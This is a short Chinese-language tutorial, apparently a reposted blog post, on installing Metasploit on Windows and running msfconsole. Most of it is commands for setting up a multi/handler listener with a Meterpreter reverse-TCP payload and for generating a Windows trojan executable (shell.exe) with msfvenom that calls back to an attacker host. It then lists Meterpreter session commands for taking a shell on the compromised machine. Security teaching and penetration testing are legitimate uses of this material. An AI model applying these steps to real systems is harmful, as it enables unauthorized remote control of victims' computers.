简介
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
1.安装
下载链接:
点击选择相应版本下载,我下的是win64版本,
一路next安装,选择默认设置即可。
2.使用
1.启动方式
多种使用方式
1可以打开安装bin目录直接启动默认安装目录在C:\metasploit-framework\bin
双击msfconsole.bat文件启动
2可以将目录C:\metasploit-framework\bin添加配置到系统环境变量Path,然后打开命令行cmd直接msfconsole即可使用
3创建快捷方式将目标地址修改为C:\metasploit-framework\bin,双击快捷方式即可。
2.攻击模块
展示辅助模块
show auxiliary
显示对应模块信息
info auxiliary/vsploit/pii/web_pii
搜索模块信息
search windows
使用监听模块
use exploit/multi/handler
设置payload攻击载荷
set payload windows/meterpreter/reverse_tcp
options查看设置选项
options或show options
设置坚监听主机ip和端口并查看设置情况
set LHOST 192.168.1.105
set LPORT 10010
options
exploit或run执行
exploit-j后台执行
生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP地址LPORT=1O000 -f exe>C:\tool\shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=1O010 -f exe>C:\tool\shell.exe
jobs查看监听状况
sessions -i 1连接meterperter
kill 1 杀死监听进程
sysinfo查看系统信息
shell进入终端
background进入后台
help查看帮助命令
目前总结的就是这些。
版权归原作者 夜yesir 所有, 如有侵权,请联系我们删除。